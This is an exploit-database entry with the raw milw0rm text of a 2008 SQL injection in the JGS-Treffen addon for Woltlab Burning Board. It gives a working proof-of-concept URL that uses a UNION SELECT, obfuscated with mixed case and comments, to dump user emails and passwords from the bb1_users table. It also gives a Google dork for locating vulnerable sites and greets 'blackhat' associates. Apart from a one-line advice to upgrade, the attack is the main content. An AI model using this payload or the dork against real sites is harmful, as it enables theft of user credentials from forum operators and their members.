Woltlab Burning Board Addon JGS-Treffen SQL Injection

vendor:

Burning Board Addon JGS-Treffen

by:

h0yt3r

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Burning Board Addon JGS-Treffen

Affected Version From: 2.0.2

Affected Version To: 2.0.2

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Woltlab Burning Board Addon JGS-Treffen SQL Injection

There is a bug in jgs_treffen.php 2.0.2 and lower which allows an attacker to inject malicious SQL code into the vulnerable application. The PoC for this exploit is jgs_treffen.php?action=ansicht&view_id='-1/**/UnIoN/**/All/**/SeLeCt/**/1,2,CoNcAt(email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/bb1_users/*

Mitigation:

Upgrade to the latest version of jgs_treffen.php

Source

Exploit-DB raw data:

######################
#
#Woltlab Burning Board Addon JGS-Treffen SQL Injection
#
######################
#
#Bug by: h0yt3r
#
#Dork: inurl:jgs_treffen.php
#
##
###
##
#
#There is a bug in jgs_treffen.php 2.0.2 and lower.
#It's already fixed in newer Versions...
#
#SQL Injection:
#http://[target]/[path]/jgs_treffen.php?action=ansicht&view_id=[SQL]
#
#PoC:
#jgs_treffen.php?action=ansicht&view_id='-1/**/UnIoN/**/All/**/SeLeCt/**/1,2,CoNcAt(email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/bb1_users/*
#
#######################
#
#Greetz to ramon, thund3r and all the other dirty blackhat rest xD!
#
#######################
####################### 

# milw0rm.com [2008-03-31]